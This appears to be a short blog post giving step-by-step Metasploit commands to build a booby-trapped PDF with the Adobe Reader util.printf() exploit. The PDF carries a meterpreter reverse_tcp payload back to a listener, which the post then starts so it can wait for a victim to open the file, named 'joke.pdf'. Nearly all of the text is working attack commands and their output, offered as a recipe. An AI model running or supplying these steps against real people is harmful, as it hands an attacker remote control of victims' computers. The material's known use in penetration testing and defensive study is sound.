control – metasploit adobe util.printf() client-side exploit

Metasploit adobe util.printf() client-side exploit

works against Adobe Reader v8.1.2

sudo msfconsole

use exploit/windows/fileformat/adobe_utilprintf

set FILENAME joke.pdf

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.1

show options

exploit

[*] Creating ‘bufferoverflow.pdf’ file…
[+] bufferoverflow.pdf stored at /home/.msf4/local/bufferoverflow.pdf

Then open another window

sudo msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.0.1 e

Wait for client to open the pdf

Any AV will highlight this and block it.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s